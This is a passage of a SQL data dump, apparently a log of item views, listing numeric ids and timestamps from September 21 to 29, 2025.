05:17:53'),(91156,4950,1,'2025-09-21','2025-09-21 06:09:40'),(91157,5545,1,'2025-09-21','2025-09-21 07:57:37'),(91158,1718,1,'2025-09-21','2025-09-21 08:06:52'),(91159,1718,1,'2025-09-21','2025-09-21 08:06:53'),(91160,472,1,'2025-09-21','2025-09-21 11:11:09'),(91161,1586,1,'2025-09-21','2025-09-21 12:24:25'),(91162,5549,1,'2025-09-21','2025-09-21 14:21:57'),(91163,91,1,'2025-09-21','2025-09-21 14:56:58'),(91164,4301,1,'2025-09-21','2025-09-21 15:43:06'),(91165,4950,1,'2025-09-21','2025-09-21 16:46:35'),(91166,4950,1,'2025-09-21','2025-09-21 16:49:51'),(91167,3781,1,'2025-09-21','2025-09-21 17:14:31'),(91168,3781,1,'2025-09-21','2025-09-21 17:14:32'),(91169,5400,1,'2025-09-21','2025-09-21 17:24:37'),(91170,3710,1,'2025-09-21','2025-09-21 17:56:40'),(91171,5406,1,'2025-09-21','2025-09-21 18:41:56'),(91172,473,1,'2025-09-21','2025-09-21 21:13:43'),(91173,474,1,'2025-09-21','2025-09-21 21:15:55'),(91174,4950,1,'2025-09-21','2025-09-21 21:25:30'),(91175,80,1,'2025-09-22','2025-09-22 01:34:35'),(91176,1582,1,'2025-09-22','2025-09-22 01:45:05'),(91177,5605,1,'2025-09-22','2025-09-22 02:06:23'),(91178,5495,1,'2025-09-22','2025-09-22 02:34:43'),(91179,4677,1,'2025-09-22','2025-09-22 02:57:16'),(91180,5383,1,'2025-09-22','2025-09-22 03:37:30'),(91181,5567,1,'2025-09-22','2025-09-22 05:53:33'),(91182,1590,1,'2025-09-22','2025-09-22 07:17:27'),(91183,1590,1,'2025-09-22','2025-09-22 07:17:33'),(91184,4960,1,'2025-09-22','2025-09-22 08:56:04'),(91185,4930,1,'2025-09-22','2025-09-22 08:57:56'),(91186,5464,1,'2025-09-22','2025-09-22 10:26:19'),(91187,1588,1,'2025-09-22','2025-09-22 11:58:11'),(91188,1588,1,'2025-09-22','2025-09-22 11:58:12'),(91189,5502,1,'2025-09-22','2025-09-22 12:06:03'),(91190,3297,1,'2025-09-22','2025-09-22 12:43:46'),(91191,2704,1,'2025-09-22','2025-09-22 12:46:47'),(91192,2804,1,'2025-09-22','2025-09-22 12:48:09'),(91193,5323,1,'2025-09-22','2025-09-22 13:01:59'),(91194,1722,1,'2025-09-22','2025-09-22 14:22:44'),(91195,5334,1,'2025-09-22','2025-09-22 14:26:02'),(91196,91,1,'2025-09-22','2025-09-22 14:59:02'),(91197,2751,1,'2025-09-22','2025-09-22 17:05:10'),(91198,4612,1,'2025-09-22','2025-09-22 17:10:51'),(91199,2804,1,'2025-09-22','2025-09-22 18:50:43'),(91200,4960,1,'2025-09-22','2025-09-22 19:57:42'),(91201,1718,1,'2025-09-22','2025-09-22 20:06:32'),(91202,4363,1,'2025-09-22','2025-09-22 20:42:08'),(91203,5420,1,'2025-09-22','2025-09-22 21:09:09'),(91204,5425,1,'2025-09-22','2025-09-22 22:20:16'),(91205,91,1,'2025-09-22','2025-09-22 22:45:09'),(91206,5512,1,'2025-09-22','2025-09-22 23:35:58'),(91207,3282,1,'2025-09-23','2025-09-23 03:41:23'),(91208,2904,1,'2025-09-23','2025-09-23 04:09:46'),(91209,1718,1,'2025-09-23','2025-09-23 07:23:53'),(91210,5378,1,'2025-09-23','2025-09-23 08:30:31'),(91211,4950,1,'2025-09-23','2025-09-23 09:59:12'),(91212,1718,1,'2025-09-23','2025-09-23 11:09:06'),(91213,4556,1,'2025-09-23','2025-09-23 11:16:07'),(91214,1718,1,'2025-09-23','2025-09-23 11:55:48'),(91215,4608,1,'2025-09-23','2025-09-23 12:24:56'),(91216,4608,1,'2025-09-23','2025-09-23 12:29:54'),(91217,5425,1,'2025-09-23','2025-09-23 12:32:58'),(91218,5585,1,'2025-09-23','2025-09-23 12:33:37'),(91219,5425,1,'2025-09-23','2025-09-23 12:34:10'),(91220,4950,1,'2025-09-23','2025-09-23 12:52:44'),(91221,4608,1,'2025-09-23','2025-09-23 14:06:58'),(91222,4608,1,'2025-09-23','2025-09-23 14:12:23'),(91223,2395,1,'2025-09-23','2025-09-23 14:14:03'),(91224,4608,1,'2025-09-23','2025-09-23 14:35:25'),(91225,2775,1,'2025-09-23','2025-09-23 14:46:59'),(91226,4608,1,'2025-09-23','2025-09-23 14:54:25'),(91227,467,1,'2025-09-23','2025-09-23 15:01:00'),(91228,91,1,'2025-09-23','2025-09-23 15:06:09'),(91229,1582,1,'2025-09-23','2025-09-23 15:41:20'),(91230,5415,1,'2025-09-23','2025-09-23 15:43:51'),(91231,5415,1,'2025-09-23','2025-09-23 15:43:57'),(91232,4765,1,'2025-09-23','2025-09-23 15:49:16'),(91233,1586,1,'2025-09-23','2025-09-23 15:49:27'),(91234,5131,1,'2025-09-23','2025-09-23 15:54:59'),(91235,479,1,'2025-09-23','2025-09-23 16:15:49'),(91236,3069,1,'2025-09-23','2025-09-23 17:15:21'),(91237,5515,1,'2025-09-23','2025-09-23 17:16:24'),(91238,477,1,'2025-09-23','2025-09-23 17:16:33'),(91239,4977,1,'2025-09-23','2025-09-23 17:47:47'),(91240,4944,1,'2025-09-23','2025-09-23 17:51:59'),(91241,110,1,'2025-09-23','2025-09-23 17:53:02'),(91242,335,1,'2025-09-23','2025-09-23 20:02:10'),(91243,2904,1,'2025-09-23','2025-09-23 20:03:03'),(91244,335,1,'2025-09-23','2025-09-23 20:04:13'),(91245,4966,1,'2025-09-23','2025-09-23 20:16:46'),(91246,4950,1,'2025-09-23','2025-09-23 20:57:05'),(91247,84,1,'2025-09-23','2025-09-23 21:26:18'),(91248,4301,1,'2025-09-23','2025-09-23 21:41:12'),(91249,4966,1,'2025-09-23','2025-09-23 23:19:31'),(91250,4608,1,'2025-09-23','2025-09-23 23:24:04'),(91251,1612,1,'2025-09-24','2025-09-24 00:25:21'),(91252,5062,1,'2025-09-24','2025-09-24 00:38:28'),(91253,1612,1,'2025-09-24','2025-09-24 00:38:56'),(91254,5163,1,'2025-09-24','2025-09-24 01:02:41'),(91255,5461,1,'2025-09-24','2025-09-24 01:43:04'),(91256,1582,1,'2025-09-24','2025-09-24 02:42:05'),(91257,1608,1,'2025-09-24','2025-09-24 04:12:20'),(91258,4792,1,'2025-09-24','2025-09-24 04:34:27'),(91259,5140,1,'2025-09-24','2025-09-24 06:08:38'),(91260,76,1,'2025-09-24','2025-09-24 07:51:33'),(91261,3267,1,'2025-09-24','2025-09-24 08:28:06'),(91262,5578,1,'2025-09-24','2025-09-24 09:02:10'),(91263,1718,1,'2025-09-24','2025-09-24 09:14:14'),(91264,108,1,'2025-09-24','2025-09-24 09:22:40'),(91265,87,1,'2025-09-24','2025-09-24 09:24:29'),(91266,470,1,'2025-09-24','2025-09-24 09:24:53'),(91267,5515,1,'2025-09-24','2025-09-24 10:22:24'),(91268,5356,1,'2025-09-24','2025-09-24 11:15:32'),(91269,1612,1,'2025-09-24','2025-09-24 11:50:36'),(91270,1604,1,'2025-09-24','2025-09-24 12:41:41'),(91271,4966,1,'2025-09-24','2025-09-24 13:23:39'),(91272,4776,1,'2025-09-24','2025-09-24 13:46:40'),(91273,5436,1,'2025-09-24','2025-09-24 13:48:03'),(91274,5549,1,'2025-09-24','2025-09-24 14:06:32'),(91275,3083,1,'2025-09-24','2025-09-24 14:11:14'),(91276,1730,1,'2025-09-24','2025-09-24 14:37:00'),(91277,5454,1,'2025-09-24','2025-09-24 14:45:03'),(91278,2704,1,'2025-09-24','2025-09-24 15:16:20'),(91279,1774,1,'2025-09-24','2025-09-24 15:32:09'),(91280,91,1,'2025-09-24','2025-09-24 15:39:56'),(91281,4432,1,'2025-09-24','2025-09-24 15:59:15'),(91282,5561,1,'2025-09-24','2025-09-24 16:03:18'),(91283,3097,1,'2025-09-24','2025-09-24 16:09:18'),(91284,3691,1,'2025-09-24','2025-09-24 16:10:01'),(91285,4520,1,'2025-09-24','2025-09-24 16:44:24'),(91286,5146,1,'2025-09-24','2025-09-24 17:10:28'),(91287,5433,1,'2025-09-24','2025-09-24 17:19:23'),(91288,5409,1,'2025-09-24','2025-09-24 17:33:00'),(91289,5125,1,'2025-09-24','2025-09-24 17:38:23'),(91290,5567,1,'2025-09-24','2025-09-24 17:39:27'),(91291,4950,1,'2025-09-24','2025-09-24 17:44:33'),(91292,5436,1,'2025-09-24','2025-09-24 17:48:41'),(91293,5492,1,'2025-09-24','2025-09-24 17:52:14'),(91294,5409,1,'2025-09-24','2025-09-24 17:53:11'),(91295,74,1,'2025-09-24','2025-09-24 18:45:55'),(91296,3774,1,'2025-09-24','2025-09-24 18:52:01'),(91297,5593,1,'2025-09-24','2025-09-24 21:01:35'),(91298,1604,1,'2025-09-24','2025-09-24 21:08:49'),(91299,5028,1,'2025-09-24','2025-09-24 21:17:20'),(91300,3251,1,'2025-09-25','2025-09-25 00:14:10'),(91301,5530,1,'2025-09-25','2025-09-25 00:57:12'),(91302,2704,1,'2025-09-25','2025-09-25 02:03:45'),(91303,5545,1,'2025-09-25','2025-09-25 02:42:48'),(91304,2297,1,'2025-09-25','2025-09-25 04:37:22'),(91305,4373,1,'2025-09-25','2025-09-25 06:28:13'),(91306,89,1,'2025-09-25','2025-09-25 06:40:34'),(91307,5062,1,'2025-09-25','2025-09-25 09:12:51'),(91308,1544,1,'2025-09-25','2025-09-25 11:15:36'),(91309,4238,1,'2025-09-25','2025-09-25 11:17:29'),(91310,68,1,'2025-09-25','2025-09-25 13:54:25'),(91311,4930,1,'2025-09-25','2025-09-25 13:55:13'),(91312,91,1,'2025-09-25','2025-09-25 13:55:57'),(91313,5248,1,'2025-09-25','2025-09-25 13:57:43'),(91314,5248,1,'2025-09-25','2025-09-25 13:57:45'),(91315,74,1,'2025-09-25','2025-09-25 14:16:22'),(91316,1728,1,'2025-09-25','2025-09-25 14:36:20'),(91317,3287,1,'2025-09-25','2025-09-25 14:45:24'),(91318,5378,1,'2025-09-25','2025-09-25 15:14:30'),(91319,2165,1,'2025-09-25','2025-09-25 15:17:20'),(91320,108,1,'2025-09-25','2025-09-25 15:22:19'),(91321,72,1,'2025-09-25','2025-09-25 15:22:44'),(91322,91,1,'2025-09-25','2025-09-25 15:51:15'),(91323,5515,1,'2025-09-25','2025-09-25 15:56:23'),(91324,2617,1,'2025-09-25','2025-09-25 16:01:39'),(91325,5397,1,'2025-09-25','2025-09-25 17:15:19'),(91326,4400,1,'2025-09-25','2025-09-25 17:27:03'),(91327,5578,1,'2025-09-25','2025-09-25 17:30:10'),(91328,5400,1,'2025-09-25','2025-09-25 17:30:23'),(91329,91,1,'2025-09-25','2025-09-25 17:33:09'),(91330,4722,1,'2025-09-25','2025-09-25 17:33:58'),(91331,5598,1,'2025-09-25','2025-09-25 17:37:18'),(91332,4983,1,'2025-09-25','2025-09-25 17:52:22'),(91333,3023,1,'2025-09-25','2025-09-25 19:10:03'),(91334,470,1,'2025-09-25','2025-09-25 19:42:27'),(91335,5502,1,'2025-09-25','2025-09-25 19:53:46'),(91336,2410,1,'2025-09-25','2025-09-25 19:58:21'),(91337,473,1,'2025-09-25','2025-09-25 20:03:27'),(91338,5582,1,'2025-09-25','2025-09-25 20:20:01'),(91339,5062,1,'2025-09-25','2025-09-25 20:35:27'),(91340,4404,1,'2025-09-25','2025-09-25 21:29:24'),(91341,1715,1,'2025-09-25','2025-09-25 22:04:31'),(91342,1544,1,'2025-09-25','2025-09-25 22:31:55'),(91343,5371,1,'2025-09-25','2025-09-25 22:42:38'),(91344,1703,1,'2025-09-25','2025-09-25 22:47:06'),(91345,3721,1,'2025-09-25','2025-09-25 23:26:47'),(91346,4950,1,'2025-09-26','2025-09-26 01:30:00'),(91347,2165,1,'2025-09-26','2025-09-26 02:41:28'),(91348,1600,1,'2025-09-26','2025-09-26 03:04:37'),(91349,4983,1,'2025-09-26','2025-09-26 03:10:32'),(91350,5593,1,'2025-09-26','2025-09-26 04:20:12'),(91351,1730,1,'2025-09-26','2025-09-26 04:37:52'),(91352,1768,1,'2025-09-26','2025-09-26 04:46:28'),(91353,5146,1,'2025-09-26','2025-09-26 05:21:31'),(91354,2410,1,'2025-09-26','2025-09-26 06:30:45'),(91355,3781,1,'2025-09-26','2025-09-26 06:59:44'),(91356,68,1,'2025-09-26','2025-09-26 08:08:50'),(91357,5280,1,'2025-09-26','2025-09-26 08:33:06'),(91358,4950,1,'2025-09-26','2025-09-26 09:22:41'),(91359,74,1,'2025-09-26','2025-09-26 09:23:32'),(91360,1722,1,'2025-09-26','2025-09-26 10:17:24'),(91361,1722,1,'2025-09-26','2025-09-26 10:19:14'),(91362,1722,1,'2025-09-26','2025-09-26 10:22:39'),(91363,5343,1,'2025-09-26','2025-09-26 10:28:03'),(91364,4950,1,'2025-09-26','2025-09-26 10:29:33'),(91365,4950,1,'2025-09-26','2025-09-26 10:30:43'),(91366,5353,1,'2025-09-26','2025-09-26 10:35:21'),(91367,3127,1,'2025-09-26','2025-09-26 10:51:49'),(91368,4768,1,'2025-09-26','2025-09-26 11:39:27'),(91369,4950,1,'2025-09-26','2025-09-26 11:49:12'),(91370,4950,1,'2025-09-26','2025-09-26 11:53:37'),(91371,80,1,'2025-09-26','2025-09-26 11:53:44'),(91372,2411,1,'2025-09-26','2025-09-26 12:03:58'),(91373,4566,1,'2025-09-26','2025-09-26 12:09:51'),(91374,4950,1,'2025-09-26','2025-09-26 13:55:23'),(91375,2748,1,'2025-09-26','2025-09-26 14:20:57'),(91376,4323,1,'2025-09-26','2025-09-26 14:50:46'),(91377,5400,1,'2025-09-26','2025-09-26 15:28:00'),(91378,5400,1,'2025-09-26','2025-09-26 15:31:04'),(91379,5256,1,'2025-09-26','2025-09-26 15:41:02'),(91380,91,1,'2025-09-26','2025-09-26 15:55:37'),(91381,482,1,'2025-09-26','2025-09-26 15:59:32'),(91382,5371,1,'2025-09-26','2025-09-26 16:36:19'),(91383,4977,1,'2025-09-26','2025-09-26 16:50:24'),(91384,5454,1,'2025-09-26','2025-09-26 17:32:10'),(91385,3752,1,'2025-09-26','2025-09-26 17:45:22'),(91386,5567,1,'2025-09-26','2025-09-26 18:00:49'),(91387,4977,1,'2025-09-26','2025-09-26 18:02:57'),(91388,1728,1,'2025-09-26','2025-09-26 18:08:59'),(91389,110,1,'2025-09-26','2025-09-26 18:14:09'),(91390,2804,1,'2025-09-26','2025-09-26 18:16:50'),(91391,4756,1,'2025-09-26','2025-09-26 18:41:03'),(91392,5320,1,'2025-09-26','2025-09-26 19:25:34'),(91393,1778,1,'2025-09-26','2025-09-26 19:48:18'),(91394,89,1,'2025-09-26','2025-09-26 20:10:03'),(91395,4888,1,'2025-09-26','2025-09-26 20:28:10'),(91396,2748,1,'2025-09-26','2025-09-26 20:41:33'),(91397,3531,1,'2025-09-26','2025-09-26 21:26:22'),(91398,1722,1,'2025-09-26','2025-09-26 21:55:48'),(91399,3263,1,'2025-09-26','2025-09-26 22:02:29'),(91400,3316,1,'2025-09-26','2025-09-26 22:20:31'),(91401,4950,1,'2025-09-26','2025-09-26 22:32:17'),(91402,4674,1,'2025-09-26','2025-09-26 22:38:30'),(91403,5276,1,'2025-09-26','2025-09-26 23:31:36'),(91404,467,1,'2025-09-26','2025-09-26 23:43:42'),(91405,4387,1,'2025-09-27','2025-09-27 00:01:37'),(91406,72,1,'2025-09-27','2025-09-27 00:12:47'),(91407,5492,1,'2025-09-27','2025-09-27 00:30:35'),(91408,4960,1,'2025-09-27','2025-09-27 00:39:42'),(91409,4779,1,'2025-09-27','2025-09-27 00:59:34'),(91410,1610,1,'2025-09-27','2025-09-27 01:24:20'),(91411,4391,1,'2025-09-27','2025-09-27 01:49:08'),(91412,1604,1,'2025-09-27','2025-09-27 02:22:43'),(91413,5436,1,'2025-09-27','2025-09-27 02:27:36'),(91414,3034,1,'2025-09-27','2025-09-27 02:55:47'),(91415,3280,1,'2025-09-27','2025-09-27 03:10:45'),(91416,4744,1,'2025-09-27','2025-09-27 03:14:44'),(91417,3027,1,'2025-09-27','2025-09-27 03:39:42'),(91418,5157,1,'2025-09-27','2025-09-27 04:04:39'),(91419,4832,1,'2025-09-27','2025-09-27 04:09:41'),(91420,4498,1,'2025-09-27','2025-09-27 04:14:45'),(91421,1739,1,'2025-09-27','2025-09-27 04:23:47'),(91422,3257,1,'2025-09-27','2025-09-27 04:48:54'),(91423,1707,1,'2025-09-27','2025-09-27 04:54:31'),(91424,3585,1,'2025-09-27','2025-09-27 04:58:43'),(91425,3102,1,'2025-09-27','2025-09-27 05:03:41'),(91426,4329,1,'2025-09-27','2025-09-27 05:08:43'),(91427,4753,1,'2025-09-27','2025-09-27 05:23:47'),(91428,3704,1,'2025-09-27','2025-09-27 05:32:48'),(91429,4492,1,'2025-09-27','2025-09-27 05:37:43'),(91430,4660,1,'2025-09-27','2025-09-27 05:52:30'),(91431,80,1,'2025-09-27','2025-09-27 05:56:21'),(91432,4648,1,'2025-09-27','2025-09-27 06:23:46'),(91433,3251,1,'2025-09-27','2025-09-27 06:29:19'),(91434,3251,1,'2025-09-27','2025-09-27 06:35:10'),(91435,3251,1,'2025-09-27','2025-09-27 06:35:31'),(91436,5101,1,'2025-09-27','2025-09-27 07:26:16'),(91437,1584,1,'2025-09-27','2025-09-27 07:27:40'),(91438,4996,1,'2025-09-27','2025-09-27 07:31:34'),(91439,2297,1,'2025-09-27','2025-09-27 09:18:41'),(91440,4424,1,'2025-09-27','2025-09-27 11:05:55'),(91441,5058,1,'2025-09-27','2025-09-27 11:14:08'),(91442,5428,1,'2025-09-27','2025-09-27 11:37:47'),(91443,4688,1,'2025-09-27','2025-09-27 11:45:42'),(91444,1728,1,'2025-09-27','2025-09-27 13:07:26'),(91445,3731,1,'2025-09-27','2025-09-27 13:11:48'),(91446,5409,1,'2025-09-27','2025-09-27 13:20:48'),(91447,1701,1,'2025-09-27','2025-09-27 13:38:46'),(91448,5425,1,'2025-09-27','2025-09-27 14:54:55'),(91449,4983,1,'2025-09-27','2025-09-27 14:59:51'),(91450,5467,1,'2025-09-27','2025-09-27 15:14:43'),(91451,3486,1,'2025-09-27','2025-09-27 15:27:44'),(91452,3278,1,'2025-09-27','2025-09-27 15:32:01'),(91453,4627,1,'2025-09-27','2025-09-27 15:48:08'),(91454,3705,1,'2025-09-27','2025-09-27 15:54:12'),(91455,91,1,'2025-09-27','2025-09-27 15:58:28'),(91456,5397,1,'2025-09-27','2025-09-27 16:03:42'),(91457,3788,1,'2025-09-27','2025-09-27 16:12:04'),(91458,3273,1,'2025-09-27','2025-09-27 16:24:49'),(91459,4489,1,'2025-09-27','2025-09-27 16:30:16'),(91460,3675,1,'2025-09-27','2025-09-27 16:36:25'),(91461,4556,1,'2025-09-27','2025-09-27 16:36:53'),(91462,1718,1,'2025-09-27','2025-09-27 16:38:36'),(91463,4608,1,'2025-09-27','2025-09-27 16:40:19'),(91464,4416,1,'2025-09-27','2025-09-27 16:53:15'),(91465,5248,1,'2025-09-27','2025-09-27 16:57:43'),(91466,5433,1,'2025-09-27','2025-09-27 17:37:31'),(91467,4660,1,'2025-09-27','2025-09-27 17:52:17'),(91468,5454,1,'2025-09-27','2025-09-27 17:53:10'),(91469,5578,1,'2025-09-27','2025-09-27 18:06:40'),(91470,1705,1,'2025-09-27','2025-09-27 18:13:41'),(91471,3038,1,'2025-09-27','2025-09-27 18:27:31'),(91472,1726,1,'2025-09-27','2025-09-27 19:26:24'),(91473,4556,1,'2025-09-27','2025-09-27 20:00:35'),(91474,5573,1,'2025-09-27','2025-09-27 20:01:49'),(91475,4870,1,'2025-09-27','2025-09-27 20:30:46'),(91476,4941,1,'2025-09-27','2025-09-27 20:45:28'),(91477,84,1,'2025-09-27','2025-09-27 21:39:58'),(91478,4966,1,'2025-09-27','2025-09-27 22:07:39'),(91479,2411,1,'2025-09-27','2025-09-27 22:14:00'),(91480,2063,1,'2025-09-27','2025-09-27 22:30:44'),(91481,4897,1,'2025-09-27','2025-09-27 23:18:47'),(91482,4444,1,'2025-09-28','2025-09-28 00:46:40'),(91483,3724,1,'2025-09-28','2025-09-28 01:55:48'),(91484,91,1,'2025-09-28','2025-09-28 02:07:21'),(91485,4612,1,'2025-09-28','2025-09-28 02:36:47'),(91486,4639,1,'2025-09-28','2025-09-28 03:54:51'),(91487,5512,1,'2025-09-28','2025-09-28 04:37:47'),(91488,5454,1,'2025-09-28','2025-09-28 04:45:46'),(91489,5457,1,'2025-09-28','2025-09-28 04:58:01'),(91490,3674,1,'2025-09-28','2025-09-28 04:59:43'),(91491,4785,1,'2025-09-28','2025-09-28 05:18:45'),(91492,1590,1,'2025-09-28','2025-09-28 05:46:49'),(91493,2993,1,'2025-09-28','2025-09-28 05:59:45'),(91494,3257,1,'2025-09-28','2025-09-28 06:14:28'),(91495,2411,1,'2025-09-28','2025-09-28 06:28:44'),(91496,5593,1,'2025-09-28','2025-09-28 06:40:47'),(91497,474,1,'2025-09-28','2025-09-28 07:21:51'),(91498,476,1,'2025-09-28','2025-09-28 08:58:49'),(91499,5157,1,'2025-09-28','2025-09-28 09:46:33'),(91500,5157,1,'2025-09-28','2025-09-28 09:46:35'),(91501,5301,1,'2025-09-28','2025-09-28 10:06:46'),(91502,5137,1,'2025-09-28','2025-09-28 10:47:51'),(91503,5298,1,'2025-09-28','2025-09-28 10:58:45'),(91504,5131,1,'2025-09-28','2025-09-28 11:10:01'),(91505,72,1,'2025-09-28','2025-09-28 11:32:55'),(91506,5397,1,'2025-09-28','2025-09-28 11:37:58'),(91507,3030,1,'2025-09-28','2025-09-28 11:44:57'),(91508,3727,1,'2025-09-28','2025-09-28 11:52:01'),(91509,5522,1,'2025-09-28','2025-09-28 11:54:34'),(91510,4709,1,'2025-09-28','2025-09-28 11:59:26'),(91511,5400,1,'2025-09-28','2025-09-28 12:02:53'),(91512,5304,1,'2025-09-28','2025-09-28 12:22:40'),(91513,5461,1,'2025-09-28','2025-09-28 13:16:00'),(91514,5397,1,'2025-09-28','2025-09-28 13:18:11'),(91515,5512,1,'2025-09-28','2025-09-28 13:20:27'),(91516,1766,1,'2025-09-28','2025-09-28 14:15:30'),(91517,1604,1,'2025-09-28','2025-09-28 14:36:07'),(91518,4950,1,'2025-09-28','2025-09-28 14:39:06'),(91519,1608,1,'2025-09-28','2025-09-28 15:58:14'),(91520,4862,1,'2025-09-28','2025-09-28 16:14:07'),(91521,5307,1,'2025-09-28','2025-09-28 16:27:48'),(91522,91,1,'2025-09-28','2025-09-28 16:31:05'),(91523,2395,1,'2025-09-28','2025-09-28 16:39:39'),(91524,5433,1,'2025-09-28','2025-09-28 17:26:52'),(91525,5502,1,'2025-09-28','2025-09-28 17:53:04'),(91526,3069,1,'2025-09-28','2025-09-28 18:04:20'),(91527,5484,1,'2025-09-28','2025-09-28 18:57:49'),(91528,5530,1,'2025-09-28','2025-09-28 21:25:07'),(91529,2420,1,'2025-09-28','2025-09-28 21:51:40'),(91530,4980,1,'2025-09-28','2025-09-28 22:43:55'),(91531,5598,1,'2025-09-28','2025-09-28 23:17:57'),(91532,3777,1,'2025-09-28','2025-09-28 23:24:13'),(91533,5125,1,'2025-09-28','2025-09-28 23:29:45'),(91534,2503,1,'2025-09-29','2025-09-29 00:50:31'),(91535,76,1,'2025-09-29','2025-09-29 01:12:30'),(91536,3313,1,'2025-09-29','2025-09-29 01:23:50'),(91537,1582,1,'2025-09-29','2025-09-29 01:29:21'),(91538,89,1,'2025-09-29','2025-09-29 02:10:27'),(91539,5522,1,'2025-09-29','2025-09-29 02:25:38'),(91540,74,1,'2025-09-29','2025-09-29 02:53:14'),(91541,4582,1,'2025-09-29','2025-09-29 03:17:34'),(91542,4977,1,'2025-09-29','2025-09-29 04:44:38'),(91543,3097,1,'2025-09-29','2025-09-29 04:55:23'),(91544,5499,1,'2025-09-29','2025-09-29 06:57:52'),(91545,3271,1,'2025-09-29','2025-09-29 07:52:49'),(91546,5502,1,'2025-09-29','2025-09-29 08:06:13'),(91547,5522,1,'2025-09-29','2025-09-29 08:14:09'),(91548,5397,1,'2025-09-29','2025-09-29 10:00:23'),(91549,1586,1,'2025-09-29','2025-09-29 10:02:09'),(91550,1776,1,'2025-09-29','2025-09-29 10:17:43'),(91551,4950,1,'2025-09-29','2025-09-29 10:43:12'),(91552,4950,1,'2025-09-29','2025-09-29 11:16:10'),(91553,1699,1,'2025-09-29','2025-09-29 11:20:21'),(91554,3090,1,'2025-09-29','2025-09-29 12:35:09'),(91555,5397,1,'2025-09-29','2025-09-29 13:28:59'),(91556,4301,1,'2025-09-29','2025-09-29 15:25:03'),(91557,1586,1,'2025-09-29','2025-09-29 15:58:23'),(91558,91,1,'2025-09-29','2025-09-29 16:56:54'),(91559,5397,1,'2025-09-29','2025-09-29 17:36:15'),(91560,5502,1,'2025-09-29','2025-09-29 17:48:34'),(91561,3781,1,'2025-09-29','2025-09-29 18:14:58'),(91562,4660,1,'2025-09-29','2025-09-29 19:52:47'),(91563,5601,1,'2025-09-29','2025-09-29 19:59:11'),(91564,5605,1,'2025-09-29','2025-09-29 19:59:22'),(91565,468,1,'2025-09-29','2025-09-29 19:59:25'),(91566,470,1,'2025-09-29','2025-09-29 19:59:31'),(91567,473,1,'2025-09-29','2025-09-29 19:59:33'),(91568,487,1,'2025-09-29','2025-09-29 19:59:44'),(91569,474,1,'2025-09-29','2025-09-29 19:59:45'),(91570,1877,1,'2025-09-29','2025-09-29 19:59:55'),(91571,80,1,'2025-09-29','2025-09-29 19:59:57'),(91572,2503,1,'2025-09-29','2025-09-29 20:00:06'),(91573,1872,1,'2025-09-29','2025-09-29 20:00:08'),(91574,108,1,'2025-09-29','2025-09-29 20:00:13'),(91575,335,1,'2025-09-29','2025-09-29 20:00:16'),(91576,72,1,'2025-09-29','2025-09-29 20:00:17'),(91577,76,1,'2025-09-29','2025-09-29 20:00:38'),(91578,68,1,'2025-09-29','2025-09-29 20:00:39'),(91579,91,1,'2025-09-29','2025-09-29 20:00:43'),(91580,74,1,'2025-09-29','2025-09-29 20:00:45'),(91581,2904,1,'2025-09-29','2025-09-29 20:00:56'),(91582,4930,1,'2025-09-29','2025-09-29 20:01:14'),(91583,89,1,'2025-09-29','2025-09-29 20:01:15'),(91584,486,1,'2025-09-29','2025-09-29 20:01:22'),(91585,87,1,'2025-09-29','2025-09-29 20:01:22'),(91586,476,1,'2025-09-29','2025-09-29 20:01:25'),(91587,2420,1,'2025-09-29','2025-09-29 20:01:55'),(91588,72,1,'2025-09-29','2025-09-29 20:02:26'),(91589,5567,1,'2025-09-29','2025-09-29 20:02:28'),(91590,1582,1,'2025-09-29','2025-09-29 20:02:34'),(91591,2503,1,'2025-09-29','2025-09-29 20:02:34'),(91592,89,1,'2025-09-29','2025-09-29 20:02:36'),(91593,102,1,'2025-09-29','2025-09-29 20:02:40'),(91594,89,1,'2025-09-29','2025-09-29 20:02:42'),(91595,1606,1,'2025-09-29','2025-09-29 20:03:01'),(91596,477,1,'2025-09-29','2025-09-29 20:03:04'),(91597,478,1,'2025-09-29','2025-09-29 20:03:11'),(91598,3691,1,'2025-09-29','2025-09-29 20:03:31'),(91599,3694,1,'2025-09-29','2025-09-29 20:03:49'),(91600,479,1,'2025-09-29','2025-09-29 20:03:50'),(91601,480,1,'2025-09-29','2025-09-29 20:03:58'),(91602,481,1,'2025-09-29','2025-09-29 20:04:07'),(91603,482,1,'2025-09-29','2025-09-29 20:04:10'),(91604,483,1,'2025-09-29','2025-09-29 20:04:14'),(91605,484,1,'2025-09-29','2025-09-29 20:04:16'),(91606,1604,1,'2025-09-29','2025-09-29 20:04:26'),(91607,1602,1,'2025-09-29','2025-09-29 20:04:39'),(91608,1598,1,'2025-09-29','2025-09-29 20:04:39'),(91609,1600,1,'2025-09-29','2025-09-29 20:04:40'),(91610,1596,1,'2025-09-29','2025-09-29 20:04:40'),(91611,1594,1,'2025-09-29','2025-09-29 20:04:54'),(91612,1592,1,'2025-09-29','2025-09-29 20:04:56'),(91613,1590,1,'2025-09-29','2025-09-29 20:05:00'),(91614,1588,1,'2025-09-29','2025-09-29 20:05:05'),(91615,1586,1,'2025-09-29','2025-09-29 20:05:06'),(91616,1584,1,'2025-09-29','2025-09-29 20:05:14'),(91617,1544,1,'2025-09-29','2025-09-29 20:05:16'),(91618,4911,1,'2025-09-29','2025-09-29 20:05:28'),(91619,4944,1,'2025-09-29','2025-09-29 20:05:35'),(91620,4938,1,'2025-09-29','2025-09-29 20:05:40'),(91621,4941,1,'2025-09-29','2025-09-29 20:05:40'),(91622,4950,1,'2025-09-29','2025-09-29 20:05:48'),(91623,4960,1,'2025-09-29','2025-09-29 20:05:49'),(91624,4966,1,'2025-09-29','2025-09-29 20:05:49'),(91625,4963,1,'2025-09-29','2025-09-29 20:05:50'),(91626,5058,1,'2025-09-29','2025-09-29 20:06:07'),(91627,5062,1,'2025-09-29','2025-09-29 20:06:08'),(91628,5067,1,'2025-09-29','2025-09-29 20:06:18'),(91629,5071,1,'2025-09-29','2025-09-29 20:06:19'),(91630,5076,1,'2025-09-29','2025-09-29 20:06:26'),(91631,5080,1,'2025-09-29','2025-09-29 20:06:53'),(91632,5140,1,'2025-09-29','2025-09-29 20:06:55'),(91633,5146,1,'2025-09-29','2025-09-29 20:06:55'),(91634,5153,1,'2025-09-29','2025-09-29 20:06:56'),(91635,5157,1,'2025-09-29','2025-09-29 20:06:59'),(91636,5248,1,'2025-09-29','2025-09-29 20:07:19'),(91637,5259,1,'2025-09-29','2025-09-29 20:07:25'),(91638,5326,1,'2025-09-29','2025-09-29 20:07:36'),(91639,5264,1,'2025-09-29','2025-09-29 20:07:37'),(91640,5363,1,'2025-09-29','2025-09-29 20:08:15'),(91641,5330,1,'2025-09-29','2025-09-29 